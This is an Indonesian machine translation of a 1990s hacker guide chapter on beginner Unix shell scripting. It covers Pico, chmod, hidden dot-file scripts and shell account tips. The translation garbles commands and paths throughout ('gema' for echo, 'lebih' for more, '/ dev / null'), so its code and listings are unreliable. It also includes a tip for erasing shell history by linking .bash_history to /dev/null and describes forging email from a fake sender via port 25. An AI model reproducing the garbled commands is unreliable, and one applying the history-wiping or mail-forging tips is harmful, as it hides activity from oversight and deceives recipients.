3) Patroli situs Web Anda secara teratur. Anda tidak pernah tahu kapan itu bisa menumbuhkan bagian tubuh yang kasar atau
kata-kata nakal.
Lebih disukai menggunakan server Web yang di-host pada sistem komputer yang didedikasikan untuk apa pun kecuali situs Web.
Terbaik dari semuanya,
gunakan server web MacOS.
2) Nonaktifkan Java di browser Web Anda. Bahkan jangan * berpikir * menggunakan ActiveX atau Internet Explorer.
Dan, pertahanan nomor satu:
1) Bergabunglah dengan kami pejuang kebebasan Internet. Dibutuhkan banyak dari kita untuk memenangkan pertempuran
melawan mereka yang ingin memilih
dan pilih suara siapa yang akan didengar di Internet.
<Gambar>
Isi Volume 5:

Halaman 213
Pemrograman Shell
_________________________________________________________
Panduan untuk (kebanyakan) Hacking Tidak Berbahaya
Vol. Seri 5 Pemrogram
1: Pemrograman Shell
_________________________________________________________
Jujur untuk gosh - pemrograman itu mudah. Jika Anda belum pernah memprogram di
hidup, hari ini, dalam hitungan menit, Anda akan menjadi seorang programmer. Saya berjanji. Dan
bahkan jika Anda sudah menjadi programmer, dalam Panduan ini Anda mungkin menemukan
beberapa trik baru yang sangat menyenangkan.
Cukup mengherankan, banyak orang yang menyebut dirinya peretas tidak tahu bagaimana caranya
program. Bahkan, banyak tipe haxor el1te mengklaim mereka tidak perlu tahu caranya
ke program, karena program komputer yang melakukan kewl seperti suka masuk atau
komputer macet tersedia untuk diunduh di situs Web HacK3r dengan
api dan tengkorak animasi dan musik organ sarat azab.
Tetapi menjalankan program orang lain bukanlah peretasan. Membobol dan
menabrak komputer orang lain bukanlah peretasan. Peretasan nyata sedang mengeksplorasi
dan menemukan - dan menulis program Anda sendiri!
************************************************ ******
Dalam Panduan ini Anda akan belajar:
* Mengapa para hacker harus mempelajari cara memprogram?
* Apa itu pemrograman shell?
* Cara membuat dan menjalankan skrip
* Skrip shell dengan cepat
* Skrip yang sedikit tersembunyi
* Contoh skrip hacker yang menyenangkan
Plus, dalam tip jenius jahat, Anda akan belajar cara:
* Bicara tentang Teorema Menghidupkan Mesin Pemutar Masalah seolah-olah Anda adalah beberapa
semacam jenius forking
* Temukan instruksi tentang cara membuat virus yang mematikan
* Atur editor favorit Anda sebagai default di Pine
* Tautkan file histori bash Anda ke dev / null
* Menjaga agar Trojan tidak dieksekusi di akun Anda
* Selamatkan diri Anda dari mengacaukan file .tcshrc, .bashrc dll. Anda sepenuhnya.
************************************************ *****
Mengapa Para Peretas Harus Belajar Bagaimana Memprogram?
Kembali pada tahun 1971, ketika saya berusia 24 tahun, saya sama tidak teknisnya dengan mereka. Tapi milikku
suami pada saat itu, H. Keith Henson, selalu berbicara tentang "penyangga,"
"buffer out" dan hal-hal bahasa rakitan.
Keith adalah salah satu peretas paling awal, dan seorang peretas dalam arti murni,
seseorang yang tidak takut untuk mencoba hal-hal yang tidak biasa untuk menghemat memori (langka

Halaman 214
sumber daya bahkan pada komputer terbesar tahun 1970-an) atau memotong siklus CPU. Begitu
suatu pagi di bulan Juni, bosan denganku tampak bingung ketika dia pulang mengoceh
bersemangat tentang prestasi terbarunya, dia mengumumkan, "Kamu akan belajar bagaimana caranya
"Dia bersikeras bahwa saya mendaftar untuk kursus di Fortran di
Universitas Arizona.
Tugas kelas pertama adalah duduk di mesin kartu punch dan memukul keluar
sebuah program untuk CDC 6400 yang akan mengurutkan daftar kata berdasarkan abjad.
Sangat menyenangkan bahwa saya menambahkan kode untuk mendeteksi input karakter yang tidak
dalam alfabet, dan untuk memberikan pesan kesalahan ketika ditemukan.
Instruktur memuji saya di depan kelas, mengatakan bahwa saya adalah satu-satunya
yang memiliki kode fitur tambahan. Saya ketagihan. Saya kemudian menulis program
dengan panjang dan kompleksitas yang cukup yang men-debug dan memverifikasi mereka memberi saya
merasakan realitas teorema Turing Machine Halting Problem.
Saya menemukan Anda tidak perlu menjadi jenius untuk menjadi seorang profesional
programmer. Anda hanya harus cukup menikmatinya untuk bekerja keras, menikmatinya
cukup untuk memimpikannya dan berfantasi dan bermain dengan pemrograman di blog Anda
keberatan bahkan ketika Anda tidak di depan keyboard.
************************************************ ****
Kiat Genius Jahat: Teorema Masalah Turing Mesin Menghentikan mengatakan itu
mustahil untuk secara menyeluruh men-debug - atau bahkan menjelajahi - komputer yang arbitrer
program. Secara praktis, ini berarti sangat sulit untuk membuat
jaringan komputer benar-benar aman, dan tidak akan pernah mungkin untuk menulis
program antivirus yang dapat melindungi terhadap semua virus yang mungkin terjadi.
Untuk perawatan yang lebih ketat dari teorema Turing Machine Halting Problem
- Belum ditulis dalam bahasa yang non-matematikawan dapat mengerti - baca
"Buku Hitam Raksasa Virus Komputer" oleh Dr. Mark Ludwig, American Eagle
Publikasi. Buku ini juga akan mengajarkan Anda cara menulis yang paling mematikan
virus di planet ini - atau program untuk melawannya! Anda dapat memesannya dari
http://www.amazon.com. Peringatan - untuk sepenuhnya menghargai buku ini, Anda
harus tahu bahasa assembly untuk CPU 80x86. Tapi itu yang paling
manual komputer elektrifikasi yang pernah saya baca !!!!
************************************************ ******
Itulah jantung semangat peretas. Jika Anda terdorong untuk melakukan lebih banyak dan
hal-hal yang lebih besar daripada pekerjaan atau sekolah Anda minta dari Anda, Anda adalah seorang hacker sejati.
Kode kiddies yang berpikir membobol komputer dan mengetik f *** setiap ketiga
kata saat di IRC bukan peretas. Mereka adalah punk dan vandal kecil-kecilan.
Tetapi jika Anda bercita-cita untuk menjadi hacker sejati, Anda akan menjadi seorang programmer, dan
meraih bintang-bintang dengan kode Anda.
Apa itu Pemrograman Shell?
Jika Anda telah mengikuti Panduan sebelumnya untuk (kebanyakan) Peretasan Tidak Berbahaya
(GTMHH), Anda sudah terbiasa dengan banyak perintah Unix yang menyenangkan. Kulit
pemrograman adalah menulis file yang menyimpan urutan perintah Unix, yang
Anda dapat berjalan di akun shell Anda dengan mengetik hanya satu baris.
************************************************ **
Catatan pemula: Tidak tahu apa itu akun shell? Unix membuat Anda scra tching
kepalamu? Anda * harus * memiliki akun shell untuk mempelajari pemrograman shell. Kamu

Halaman 215
bisa mendapatkan satu secara gratis di http://sdf.lonestar.org. Cukup buat PPP
koneksi dan telnet ke Lonestar untuk kesenangan Unix Anda! Namun, Lonestar
tidak memungkinkan Anda melakukan telnet. Untuk akun shell layanan lengkap, periksa
http://rt66.com. Iya nih! Mereka memiliki login ssh!
Untuk detail tentang cara menggunakan akun shell dan instruksi tentang banyak kesenangan
Perintah Unix, lihat GTMHH pada akun shell di
http://techbroker.com/happyhacker.html.
************************************************
Jika Anda terbiasa dengan DOS, Anda mungkin sudah melakukan hal serupa
untuk pemrograman shell: file batch DOS. Ide dasarnya adalah Anda menulis a
serangkaian perintah DOS dan simpan dengan file yang diakhiri dengan
ekstensi "kelelawar."
Misalnya, Anda dapat memberi nama file batch Anda "myfile.bat." Lalu kapan saja Anda
ingin menjalankannya, Anda cukup mengetikkan "myfile" dan menjalankan semua perintah di dalamnya
file itu. (Catatan: jika Anda berada di direktori yang berbeda dari file.bat saya, Anda
Anda harus memberi tahu komputer Anda di mana mencarinya dengan "jalur"
perintah, atau dengan mengetikkan seluruh path, misalnya "c: \ myprograms \ myfile.")
Unix - sistem operasi yang dibuat jauh sebelum DOS - dapat melakukannya
sesuatu yang sangat mirip dengan file batch DOS. Alih-alih mengetik perintah Unix
satu per satu setiap kali Anda membutuhkannya, Anda bisa menulis skrip shell itu
secara otomatis menjalankan urutan itu. Kemudian Anda menyimpannya sebagai file dengan
izin yang membuatnya dapat dieksekusi.
************************************************ *
Catatan pemula: "Dapat dijalankan" tidak berarti komputer padam dan pembunuhan
file Anda yang buruk. Itu berarti bahwa ketika Anda mengetik nama file itu, file
komputer melihat ke dalam dan melakukan apa yang diperintahkan file Anda.
"Izin" berarti apa yang dapat dilakukan oleh siapa yang memiliki file. Misalnya kamu
dapat mengatur izin pada file akun shell Anda sehingga hanya seseorang yang masuk
akun Anda bisa menjalankannya. Atau Anda bisa membuatnya jadi siapa pun di dunia
dapat menjalankan (mengeksekusi) itu - sesuatu yang biasanya Anda lakukan dengan file di
Situs web, sehingga siapa pun yang berselancar di dapat membacanya.
************************************************ *
Tetapi ada satu perbedaan besar antara perintah DOS dan Unix. Dalam DOS, file
perintah "mkdir" dan "MKDIR" melakukan hal yang persis sama. Di Unix, mereka akan melakukannya
menjadi dua perintah yang sama sekali berbeda. Berhati-hatilah dalam pelajaran ini
ketik semua perintah dalam huruf kecil (kecil), atau hal ini tidak akan berfungsi.
Cara Membuat dan Menjalankan Skrip
Mengapa kita mulai dengan pemrograman shell script? Alasannya adalah karena mereka
mudah. Jujur, mereka * mudah *. Sangat mudah, ada beberapa cara untuk membuatnya
mereka.
Pertama, mari kita berjalan dengan cara Pico untuk membuat skrip sederhana.
1) Buka program editor. Kami akan menggunakan yang termudah: Pico. Saat diminta masuk
akun shell Anda, cukup ketik "pico hackphile." ("Hackfile" akan menjadi
nama skrip yang akan Anda buat. Jika Anda tidak suka nama itu, buka Pico
dengan nama yang Anda sukai, misalnya "pico myfilename.")

Halaman 216
Ini menampilkan layar yang sangat mirip dengan program email Pine
layar "compose mail".
************************************************ ******
Kiat jenius jahat: Jika akun shell Anda setengah layak, Anda akan memilikinya
Pine dan itu akan memungkinkan Anda untuk memilih editor apa pun yang Anda inginkan untuk menulis
e-mail. Defaultnya adalah Pico. Tetapi Anda dapat mengkonfigurasinya untuk menggunakan editor lain seperti itu
sebagai vi atau emacs yang jauh lebih kuat. Pergi saja ke menu utama di Pine, lalu
ke Pengaturan, lalu ke Konfigurasi, lalu gulir ke bawah hampir ke ujung semua
pilihan. Akan ada baris "editor = pico." Masukkan editor favorit Anda!
Jika Anda secara teratur menggunakan Pine untuk menulis email, Anda akan tetap berlatih sampai
menggunakan editornya, membuatnya lebih mudah untuk menulis program.
************************************************ ******
Seperti apa tampilan layar Pico Anda:
UW PICO (tm) 2.9
File: hackphile
[ File baru ]
^ G Dapatkan Bantuan ^ O WriteOut ^ R Baca File ^ Y Sebelumnya Pg ^ K Potong Teks ^ C Cur Pos
^ X Keluar ^ J Membenarkan ^ W Di mana ^ V Selanjutnya Pg ^ U Teks Tidak Dipotong ^ T Untuk Mengeja
Di bagian bawah adalah bantuan cepat, daftar perintah Pico yang umum digunakan.
"^" Itu berarti menahan tombol kontrol sambil menekan huruf
dari alfabet yang mengikuti. Selain perintah-perintah ini, beberapa yang lain itu
membantu mengetahui untuk Pico adalah:
^ e memindahkan kursor ke akhir baris
^ a menggerakkan kursor ke awal baris
^ d menghapus karakter
^ f menggerakkan kursor ke depan (atau gunakan tombol panah -> jika itu berjalan)
^ b menggerakkan kursor ke belakang (atau gunakan tombol <- panah jika berfungsi)
^ p menggerakkan kursor ke atas (atau gunakan tombol panah ke atas jika berfungsi)
^ n memindahkan kursor ke bawah (atau gunakan tombol panah ke bawah jika berfungsi)
^ t memeriksa ejaan
2) Tulis dalam beberapa perintah Unix. Berikut ini beberapa yang menyenangkan:
gema Saya seorang programmer dan seorang hacker!
gema Hari ini saya akan pergi
echo $ 1 $ 2 $ 3 $ 4 $ 5 $ 6 $ 7 $ 8 $ 9
3) Sekarang keluar dari Pico. Tahan tombol kontrol sambil menekan "x." Pico akan
menanyakan apakah Anda ingin menyimpan file. Tekan tombol "y" untuk menyimpan. Itu akan bertanya
Anda apakah Anda ingin menyimpannya dengan nama "hackphile." Kecuali jika Anda
berubah pikiran, tekan saja tombol "enter" dan Anda selesai.
4) Selanjutnya membuatnya dapat dieksekusi. Pada sebagian besar sistem, Anda dapat melakukan ini dengan mengetik
"chmod 700 hackphile." Pada beberapa komputer perintah "chmod + x hackphile"
akan bekerja. Di komputer lain, Anda mungkin harus menulis baris di shell Anda
skrip "#! / bin / bash" (atau "#! / bin / tcsh" atau "#! / bin / csh" dll. tergantung pada

Halaman 217
jalan ke shell apa pun yang Anda gunakan) untuk membuatnya bekerja. Maaf ya begitu
rumit pada instruksi ini, tetapi ada banyak jenis berbeda
Kerang Unix dan Unix di luar sana. Mengerang.
************************************************ ****
Catatan pemula: Perintah "chmod" itu menetapkan izin. Membuat file dapat dieksekusi
hanyalah satu dari banyak hal yang dilakukan perintah magis. Ini juga mengontrol
siapa yang bisa melaksanakannya, siapa yang bisa membacanya, dan siapa yang bisa menulisnya.
Damian Bates dari Rt66 Internet menunjukkan bahwa Anda dapat mengatur izin
jadi hanya Anda yang bisa menjalankan skrip shell itu dengan mengetikkan "chmod u + rx filename"
(kamu = kamu). Jika Anda berada di "grup" Unix, Anda dapat mengizinkan grup Anda untuk mengeksekusi
dengan mengetikkan "chmod g + rx filename" (g = grup) atau Anda dapat memberikan yang lainnya
mengeksekusi izin dengan mengetikkan "chmod o + rx filename" (o = lainnya). Semua ini
dapat dilakukan dalam kombinasi seperti "chmod ug + rx nama file (pengguna dan grup dapat
membaca dan menjalankan tetapi tidak menulis) atau "chmod g-rwx filename"
Jika Anda benci mengetik semua itu, Anda bisa menggunakan angka seperti pada "chmod 700,"
yang memberi Anda, dan hanya Anda yang membaca, menulis, dan mengeksekusi izin. Menambahkan
izin untuk membaca dan mengeksekusi, tetapi tidak menulis, kepada orang lain, gunakan "chmod
755. "Untuk mempelajari lebih lanjut tentang cara menggunakan perintah nomor chmod, gunakan perintah
"man chmod."
************************************************ *****
5) Sekarang ketikkan: "hackphile forge email from Santa Claus." Tekan "enter" dan
Anda akan melihat di layar Anda: "Saya seorang programmer dan seorang hacker!
Hari ini saya akan memalsukan email dari Santa Claus. "
Cukup keren, ya? Apa yang dilakukan perintah gema terakhir adalah menemukan kata pertama
Anda mengetik setelah perintah "hackphile", yang disimpan dalam memori
lokasi $ 1, kata kedua dalam $ 2, dan seterusnya. Berbeda dengan yang lebih canggih
bahasa pemrograman, Anda tidak perlu mengatur variabel tanda dolar itu
di muka - hal yang Anda ketikkan pada baris perintah setelah nama
skrip otomatis masuk ke lokasi memori tersebut!
Sekarang anggaplah Anda ingin skrip benar-benar memalsukan email dari Santa Claus.
Sayangnya, ini adalah tempat Anda mempelajari batasan skrip shell. Kamu
dapat dimasukkan ke dalam perintah "telnet foobar.com 25" dan siap untuk memalsukan email.
Tetapi jika perintah selanjutnya dalam skrip shell Anda adalah "mail from:
santa@north.pole.com, "itu tidak akan terjadi. Masalahnya adalah Anda tidak
lebih lama di shell Unix Anda. Anda sekarang menjalankan program surat di foobar.com,
yang tidak memunculkan sisanya dalam urutan perintah shell Anda.
Tetapi bantuan sedang dalam perjalanan. Bahasa pemrograman Perl dan C akan melakukan
pekerjaan untuk Anda jauh lebih mudah daripada skrip shell. Lebih lanjut tentang ini nanti
Panduan, saya berjanji!
Bagaimana cara yang lebih menyenangkan untuk membuat skrip shell?
Script Shell on the Fly
Terburu-buru? Apakah Anda selalu melakukan sesuatu dengan sempurna? Jika demikian, coba perintah "cat"
untuk membuat skrip shell.
Berikut ini contoh yang bermanfaat. Ketikkan:

Halaman 218
daftar> cat
ls -alK | lebih
lebih |
Kemudian tahan tombol kontrol sambil menekan huruf "d." Ini akan
secara otomatis mengakhiri perintah "cat" sambil menyimpan perintah "ls -alK | lebih lanjut"
dan "w | lebih" dalam daftar "file." Kemudian buat itu bisa dieksekusi dengan perintah:
"Daftar chmod 700." (Jika chmod 700 tidak berfungsi di sistem Anda, coba
cara alternatif untuk membuatnya dapat dieksekusi dalam 4) di atas.)
Sekarang, kapan pun Anda ingin melihat semua yang ingin Anda lihat
file Anda, diikuti oleh daftar info tentang siapa pun yang juga masuk
akun shell di kotak Unix yang Anda gunakan, cukup ketik perintah "daftar."
Ini akan memberi Anda sesuatu seperti:
total 127
drwx ----- x 8 cpm 1536 28 Des 14:37.
drwxr-xr-x985 root 17920 26 Des 17:56 ..
-rw ------- 1 cpm
0 27 Agustus 08:07. Buku tambahan
-rw ------- 1 cpm 2285 27 Agustus 08:07 .addressbook.lu
lrwxrwxrwx 1 cpm
9 Okt 27 15:35 .bash_history -> / dev / null
-rw-r - r-- 1 cpm 1856 8 Okt 09:47 .cshrc
(menggunting)
3:01 siang hingga 5 hari, 6:48, 9 pengguna, rata-rata muat: 1.87, 1.30, 1.08
Pengguna tty login @ idle JCPU PCPU apa
phill ttyp0 14:39 1 11 -csh
flattman ttyp1 14:27
4 4 tf
kjherman ttyp2 1:13 siang 1:43
telnet ftp.fubar.com
cpm ttyp4 13:08
13 w
johnp ttyp5 Sat 6pm 1 1:29 7 -tcsh
kjherman ttyp6 1:15 pm 1:43
telnet fubar.com
kjherman t typ8 1:16 pm 1:43
/ bin / csh / usr / local / bin / cmenu
momshop ttyp9 14:50 10
/ usr / local / bin / pine
swit ttypa 9:56 pagi 4:20 41 -csh
kegembiraan ttypc 3:00 sore
2 1 -csh
************************************************ *
Catatan pemula: Apa artinya semua itu? Maaf, ini lanjutan
GTMHH, jadi yang akan saya katakan adalah memberi perintah "man ls" dan
"pria yang" mengetahui semua hal ini.
OKE, OKE, maaf, ini sedikit bantuan. "|" berarti "pipa." Kapan kamu
memiliki dua perintah di kedua sisi perintah pipa, ini membuat output dari
perintah di sisi kiri "|" pipa ke perintah di
sisi kanan. Jadi "w | lebih" memberitahu komputer Anda untuk melakukan perintah "w" dan
pipa outputnya ke perintah "more." Kemudian "lebih banyak" menampilkan output
monitor Anda satu layar pada satu waktu, menunggu Anda untuk menekan tombol spasi
sebelum menampilkan layar berikutnya.
Apa artinya "lrwxrwxrwx 1 cpm
9 Okt 27 15:35 .bash_history ->
/ dev / null "mean?" l "berarti itu adalah file tertaut. Kumpulan pertama rwx
Saya (pemilik akun) dapat membaca, menulis, dan mengeksekusi file ini. Itu
rwx kedua berarti grup saya juga dapat membaca, menulis, dan mengeksekusi. Set terakhir

Halaman 219
berarti siapa pun di dunia dapat membaca, menulis, dan mengeksekusi file ini. Tapi sejak itu
itu kosong, dan akan selalu tetap kosong, sayang sekali, kode kiddies.
************************************************ *
************************************************ *
Tip jenius jahat: Jika Anda melihat file riwayat bash yang seharusnya milik saya
beberapa orang yang membuat hunian pada beberapa daftar email, inilah dua cara yang Anda bisa
mengatakan itu palsu dan mereka sangat kurang dalam pengetahuan Unix.
a) Lihat notasi lucu di atas, "bash_history -> dev / null?
.bash_history telah ditautkan ke dev / null (dev / null berarti "perangkat null"
yang merupakan cara mewah untuk mengatakan segala sesuatu pergi ke surga tidak pernah ada
terlihat lagi) sejak 9 Oktober 1997 - jauh sebelum beberapa jenius sooper diemail
sekitar file palsu itu!
Inilah cara Anda dapat membuat riwayat pesta Anda menghilang. Cukup berikan
perintah "ln -s / dev / null ~ / .bash_history."
b) Jika Anda memiliki bash shell, dan belum menautkannya ke dev / null, dapatkan
ke dalamnya dan gunakan perintah "bicara" untuk mengobrol dengan seseorang untuk sementara waktu. Kemudian
beri perintah "more .bash_history." Anda akan melihat bahwa tidak seperti itu
seharusnya file riwayat bash milikku, hal-hal yang kamu ketik saat "bicara"
sesi tidak muncul dalam file .bash_history. Orang yang memalsukannya
tidak tahu ini! Entah itu, atau dia memang tahu, dan memasukkannya ke dalam trik
orang-orang yang akan membacanya dan memecat saya untuk mengungkapkan ketidaktahuan mereka.
Orang-orang yang tertangkap oleh trik ini mencoba keluar dari rasa malu mereka
tempat dengan mengklaim bahwa buffer overflow dapat membuat isi ceramah
sesi muncul di file bash history. Ya, dan kemarin mereka melihat Elvis
Presley di sebuah cerita belanjaan juga.
************************************************ *
Script Stealthy Sedikit
Sekarang anggaplah Anda khawatir tentang kode kiddies yang benar-benar tidak mengerti
akun shell Anda. Percaya atau tidak, banyak orang yang membobol komputer
hampir sama sekali tidak tahu tentang Unix. Misalnya, di Def Con V seorang teman,
Daniel, melakukan jajak pendapat informal. Dia bertanya kepada puluhan peserta apakah mereka
tahu perintah "kucing". Dia menemukan bahwa lebih dari setengah orang di sana belum pernah
bahkan pernah mendengarnya! Nah, * Anda * tahu setidaknya satu cara untuk menggunakan "kucing" sekarang!
Contoh lain dari ketidaktahuan Unix haxor adalah seorang pria yang masuk ke saya
akun shell dan menanam Trojan bernama "ls." Idenya adalah bahwa lain kali aku
melihat file saya menggunakan perintah ls Unix, ls nya akan mengeksekusi sebagai gantinya
dan buang akun saya. Tapi dia lupa memberi perintah "chmod 700 ls." Begitu
tidak pernah lari, sayang.
************************************************ ****
Tip jenius jahat: Damian menyarankan "TIDAK PERNAH menempatkan '.' (kerja saat ini
direktori atau cwd) di jalur Anda! Jika Anda benar-benar ingin "." di jalan Anda, buat
yakin itu yang terakhir. Kemudian, jika Trojan seperti ls ada di arus Anda
direktori, _real_ ls akan digunakan terlebih dahulu. Atur umask Anda (umask adalah
perintah yang secara otomatis mengatur izin pada semua file yang Anda buat, kecuali
Anda tentukan sebaliknya) untuk sesuatu yang lebih aman dari 022, saya pribadi menggunakan
077. Jangan pernah memberi grup atau akses tulis lainnya ke direktori Anda dan curiga
dari apa yang orang lain bisa baca. "
Untuk kesenangan membaca Anda, gunakan perintah "man chmod" dan "man umask" untuk
dapatkan semua detail berdarah.

Halaman 220
************************************************ ****
Berikut adalah cara membuat skrip shell yang rata-rata orang tidak mengerti
membobol komputer tidak akan bisa berjalan.
Pertama, saat Anda memberi nama skrip Anda, beri tanda titik di depan nama. Untuk
contoh, sebut saja ".secretscript". Apa yang dilakukan periode itu adalah membuatnya tersembunyi
mengajukan. Beberapa kode kiddies tidak tahu cara mencari file tersembunyi dengan
perintah "ls-a."
Setelah Anda membuat skrip, jangan berikan perintah "chmod 700". Pergi saja
itu sendiri. Kemudian ketika Anda ingin menjalankannya, berikan perintah "sh hackphile"
(menggantikan "hackphile" nama skrip apa pun yang Anda inginkan
menjalankan). Itu akan mengeksekusi meskipun Anda tidak pernah memberikan perintah chmod 700 itu!
Apa yang telah Anda lakukan dengan perintah "sh" adalah meluncurkan Unix baru sementara
shell, dan kemudian kirim ke shell perintah dari skrip Anda.
Ini contoh kerennya. Buat skrip ini:
>> lihat di sini!
siapa lagi
netstat | lebih lanjut
Ingatlah untuk menyimpan skrip ini dengan menahan tombol kontrol sambil menekan
huruf "d". Sekarang coba perintah: ". Lihat di sini!" Kamu harus kembali
sesuatu yang terlihat seperti:
bash: ./.lookeehere !: Izin ditolak
Itulah yang akan mematahkan kode kiddie rata-rata, dengan anggapan ia bahkan dapat menemukannya
naskah itu di tempat pertama.
Sekarang coba perintah "sh. Lihat di sini!" Tiba-tiba Anda mendapatkan layar setelahnya
layar barang yang sangat menarik!
Penyedia Layanan Internet Anda mungkin telah menonaktifkan beberapa perintah
Panduan ini. Atau mungkin hanya menyembunyikannya di direktori yang bisa Anda dapatkan
untuk jika Anda tahu cara mencarinya. Misalnya, jika perintah "netstat"
tidak bekerja, beri perintah "whereis netstat." atau "cari netstat".
Misalnya, jika Anda menemukannya di / usr / bin, Anda dapat membuat perintah itu
bekerja dengan "/ usr / bin / netstat" di skrip Anda.
Jika tidak ada di mana atau perintah menemukan menemukannya untuk Anda, jika Anda seorang
pemula, Anda memiliki dua pilihan. Dapatkan akun shell yang lebih baik, atau bicara
sysadmin Anda untuk mengubah izin pada file itu sehingga Anda dapat menjalankannya.
Banyak sysadmin akan membantu Anda dengan cara ini - yaitu, mereka akan membantu jika kapan
mereka memeriksa file syslog mereka, mereka tidak menemukan bukti yang Anda coba
membobol atau membuang komputer. Trik yang rapi: bawa sysadmin Anda ke kemewahan
restoran dan menunggu untuk memintanya akses ke SETIAP perintah Unix sampai sesudahnya
Anda telah membayar makanannya.
************************************************ ***
Kiat jenius jahat: Sysadmin Anda tidak akan membiarkan Anda menjalankan Unix favorit Anda
perintah? Jangan merendahkan! Kompilasi sendiri! Sebagian besar ISP tidak keberatan jika Anda tetap menggunakannya
dan gunakan barang Unix favorit Anda di akun Anda sendiri. Kata Damian, "Aku cenderung
Halaman 221
untuk menyimpan binari saya sendiri di ~ / bin / (direktori home saya slash bin) dan letakkan itu
di jalan saya. (Dengan direktori menjadi 700 atau drwx ------ tentu saja). "
Di mana Anda bisa mendapatkan sendiri? Coba http://sunsite.unc.edu/pub/Linux/welcome.html
************************************************ ***
Sekarang saatnya untuk benar-benar berpikir tentang apa yang dapat Anda lakukan dengan skrip. Iya
shell script dapat mengambil tugas yang kompleks seperti membuat Anda terkesan
teman-teman, dan memungkinkan Anda untuk melakukannya dengan memberikan hanya satu perintah per
aksi keren.
Jika Anda sedikit iseng, Anda bisa membuat banyak skrip dan
menggunakannya untuk membuat teman Anda berpikir Anda memiliki duper super khusus
sistem operasi. Dan sebenarnya, Anda benar-benar akan, secara jujur, mengendalikan
sistem operasi paling istimewa dan luar biasa di planet ini. Keindahan dan
kekuatan Unix adalah sangat mudah untuk menyesuaikannya untuk melakukan apa saja dan
segala sesuatu! Windows tidak! Unix ya!
************************************************ **
Kiat Genius Jahat: Buka file .login di Pico. Ia mengendalikan banyak hal
terjadi di akun shell Anda. Ingin mengeditnya? Anda benar-benar bisa mengacaukannya
akun Anda dengan mengubah .login. Tapi Anda seorang hacker, jadi Anda tidak takut,
kanan? Selain itu, jika Anda mengacaukan akun shell Anda, Anda akan memaksakan diri
untuk belajar Unix sangat cepat sehingga Anda dapat memperbaikinya lagi, atau berteman
dengan dukungan teknis di ISP Anda sebagai upaya Anda menjelaskan mengapa Anda tidak sengaja
memetakan huruf "e" berarti "menghapus." (Aku pernah melakukannya sekali. Hei, tidak ada siapa-siapa
sempurna!)
Misalnya, apakah Anda harus memasang menu pengasuh setiap kali Anda
masuk? Apakah Anda melihat sesuatu yang tampak seperti "/ usr / local / bin / menu" di
.masuk? Letakkan "#" di depan perintah itu (dan yang lainnya yang Anda inginkan
matikan) dan itu tidak akan dijalankan ketika Anda login. Maka jika Anda memutuskan Anda
maaf Anda mematikannya, cukup hapus "#" dan perintah itu akan berfungsi
lagi.
Damian menambahkan, "Sangat penting bagi pemula dan pertanda hebat
kecerdasan dalam guru Unix canggih mendukung sebelum Anda mengacaukannya,
yaitu, di pico Anda dari .cshrc. Baris perintah mereka harus berisi: mkdir
.trash; chmod 700 .trash; cp .cshrc .trash; pico .cshrc.
"Atau, buat alias berikut di .cshrc Anda setelah membuat
'.trash'directory: alias cadangan' cp \! $ ~ / .trash '
"Ketika Anda selanjutnya sumber .cshrc, Anda cukup ketik 'nama file cadangan' dan itu
akan disalin ke direktori .trash jika Anda membutuhkannya nanti.
"Ubah skrip startup, simpan perubahan dan kemudian telnet dalam sedetik
waktu untuk melihat apakah itu berfungsi. Jika tidak, perbaiki atau 'cp ~ / .trash / .cshrc ~'. saya
jangan sarankan Anda 'sumber' file yang baru dimodifikasi karena jika itu
kacau, begitu juga kamu. Itu selalu terbaik untuk menjaga satu sesi tidak ternodai, adil
dalam hal. Jika berfungsi baik pada login kedua Anda, maka Anda dapat 'sumber
.cshrc; rehash; ' di jendela pertama Anda untuk mengambil keuntungan dari perubahan yang dilakukan. "
************************************************ *****
OK, sekarang bagaimana dengan memotong dan bermain dengan skrip? Melihat apa
hal-hal indah yang dapat Anda lakukan dengan mereka. Itulah yang menjadi peretas
tentang, kan? Dan terima kasih kepada Damian Bates, penggemar berat Operator Bajingan
dari Neraka, untuk meninjau dan berkontribusi pada Panduan ini. Lihat Web-nya
situs di http://bofh.mysite.org/damian. Kebijaksanaan orang tua disarankan :)

Halaman 222
"Tidak mungkin kamu menggambarkan sistem kami,
dia tidak akan pernah bisa melewati keamanan kita.
Tapi aku akan menemukannya dan memastikan dia dituntut ...
dia melanggar hukum, dan dia akan membayar! "
Presiden "Blah Blah Bank"
- >>> Adakah orang lain yang melihat perbedaan kecil di sini ???????
Teks asli
Sumbangkan terjemahan yang lebih baik

Anda mungkin juga menyukai